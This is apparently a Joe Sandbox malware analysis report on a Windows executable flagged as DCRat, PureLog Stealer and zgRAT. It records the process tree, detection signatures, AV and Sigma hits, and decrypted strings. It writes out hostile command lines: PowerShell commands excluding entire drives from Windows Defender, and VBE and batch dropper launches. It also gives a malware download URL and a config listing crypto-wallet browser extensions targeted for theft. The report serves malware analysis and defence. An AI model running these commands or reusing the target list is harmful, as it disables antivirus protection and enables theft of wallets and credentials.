Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZZ2sTsJFrt.exe

Overview

General Information

Sample name:ZZ2sTsJFrt.exe
renamed because original name is a hash value
Original sample name:403138422d8da9fdd31fe147959a1403.exe
Analysis ID:1581724
MD5:403138422d8da9fdd31fe147959a1403
SHA1:913139b08964bc2039eeeea9f491c5c8507b7dcc
SHA256:4b1a5d38d7741fea74f2cf45d5b215955ba9fe117d6f6a0e7ecbef64118c449b
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops executable to a common third party application directory
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ZZ2sTsJFrt.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\ZZ2sTsJFrt.exe" MD5: 403138422D8DA9FDD31FE147959A1403)
    • wscript.exe (PID: 2128 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3104 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\PniGsaMva0WDN2bCUuIn757jtMvPYPCKlQoP3qJ.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • HyperPortContainerproviderinto.exe (PID: 3168 cmdline: "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe" MD5: 34EAB3FCCF84F6B9ABF20B49DB5FCF6E)
          • powershell.exe (PID: 6448 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6808 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6200 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4948 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1220 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2128 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 5436 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7180 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7212 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7240 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7256 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7296 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7332 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7340 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\ssh\AaHCyFZRuOMjGDqdgJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7356 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7408 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7436 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\My Pictures\AaHCyFZRuOMjGDqdgJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7464 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8248 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8712 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 9064 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • dasHost.exe (PID: 8628 cmdline: "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe" MD5: 34EAB3FCCF84F6B9ABF20B49DB5FCF6E)
      • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1188 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • svchost.exe (PID: 3396 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
ZZ2sTsJFrt.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    ZZ2sTsJFrt.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000004.00000002.1824772825.0000000012B05000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000003.1677180578.0000000005330000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000000.00000003.1676672997.00000000069F0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000004.00000000.1686573197.00000000004F2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Process Memory Space: HyperPortContainerproviderinto.exe PID: 3168JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.ZZ2sTsJFrt.exe.537e723.1.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.ZZ2sTsJFrt.exe.537e723.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.ZZ2sTsJFrt.exe.6a3e723.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.ZZ2sTsJFrt.exe.6a3e723.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.ZZ2sTsJFrt.exe.537e723.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, ProcessId: 3168, TargetFilename: C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe
                                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe", ParentImage: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, ParentProcessId: 3168, ParentProcessName: HyperPortContainerproviderinto.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 6448, ProcessName: powershell.exe
                                    Sigma detected: System File Execution Location Anomaly
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe" , CommandLine: "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, NewProcessName: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, OriginalFileName: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8248, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe" , ProcessId: 8628, ProcessName: dasHost.exe
                                    Sigma detected: WScript or CScript Dropper
                                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ZZ2sTsJFrt.exe", ParentImage: C:\Users\user\Desktop\ZZ2sTsJFrt.exe, ParentProcessId: 6784, ParentProcessName: ZZ2sTsJFrt.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" , ProcessId: 2128, ProcessName: wscript.exe
                                    Sigma detected: Powershell Defender Exclusion
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe", ParentImage: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, ParentProcessId: 3168, ParentProcessName: HyperPortContainerproviderinto.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 6448, ProcessName: powershell.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ZZ2sTsJFrt.exe", ParentImage: C:\Users\user\Desktop\ZZ2sTsJFrt.exe, ParentProcessId: 6784, ParentProcessName: ZZ2sTsJFrt.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" , ProcessId: 2128, ProcessName: wscript.exe
                                    Sigma detected: Non Interactive PowerShell Process Spawned
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe", ParentImage: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, ParentProcessId: 3168, ParentProcessName: HyperPortContainerproviderinto.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 6448, ProcessName: powershell.exe
                                    Sigma detected: Windows Processes Suspicious Parent Directory
                                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3396, ProcessName: svchost.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-28T20:42:32.204312+010020480951A Network Trojan was detected192.168.2.449734104.21.38.8480TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: ZZ2sTsJFrt.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: http://048038cm.renyash.ru/pipepacketprocessGeneratordownloads.phpAvira URL Cloud: Label: malware
                                    Antivirus detection for dropped file
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeReversingLabs: Detection: 82%
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeReversingLabs: Detection: 82%
                                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exeReversingLabs: Detection: 82%
                                    Source: C:\ProgramData\ssh\AaHCyFZRuOMjGDqdgJ.exeReversingLabs: Detection: 82%
                                    Source: C:\Users\Default\Pictures\AaHCyFZRuOMjGDqdgJ.exeReversingLabs: Detection: 82%
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeReversingLabs: Detection: 82%
                                    Source: C:\Users\user\Desktop\AXpVrZKc.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\EZcCRmIO.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\VVwrSJqk.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\cYVGOFtR.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\iczfvMBI.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\kCewxyIz.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\kKNOcijE.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\kwtgfRAG.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\ufMwPuFo.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\vqImhKDh.logReversingLabs: Detection: 50%
                                    Multi AV Scanner detection for submitted file
                                    Source: ZZ2sTsJFrt.exeReversingLabs: Detection: 70%
                                    Source: ZZ2sTsJFrt.exeVirustotal: Detection: 52%Perma Link
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: ZZ2sTsJFrt.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 00000004.00000002.1824772825.0000000012B05000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"}}
                                    Source: 00000004.00000002.1824772825.0000000012B05000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-cgzjbH04kjspqA3ekPHR","0","Nursultan Alpha","","0","0","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                    Source: ZZ2sTsJFrt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
